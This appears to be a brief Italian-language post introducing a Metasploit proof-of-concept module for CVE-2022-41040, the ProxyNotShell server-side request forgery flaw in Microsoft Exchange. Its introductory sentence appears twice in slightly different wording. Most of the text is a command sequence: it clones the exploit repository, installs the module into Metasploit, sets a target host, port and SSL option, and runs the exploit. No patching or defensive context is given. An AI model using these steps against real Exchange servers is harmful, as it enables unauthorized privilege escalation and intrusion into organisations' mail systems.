
lo script metasploit (POC) relativo a CVE-2022-41040. Microsoft Exchange è vulnerabile a un attacco di server-side request forgery (SSRF). Un attaccante autenticato può usare la vulnerabilità per elevare i privilegi.
Lo script Metasploit (POC) per CVE-2022-41040. Microsoft Exchange è vulnerabile a un attacco di server-side request forgery (SSRF). Un utente autenticato può sfruttare la vulnerabilità per elevare i privilegi.
git clone https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell
cd CVE-2022-41040-metasploit-ProxyNotShell
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp microsoft_exchange_server_proxynotshell_ssrf.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/microsoft_exchange_server_proxynotshell_ssrf.py
msfconsole
set rhosts <vuln ip/host>
set rport <vuln port>
set rssl <default: true for https>
exploit
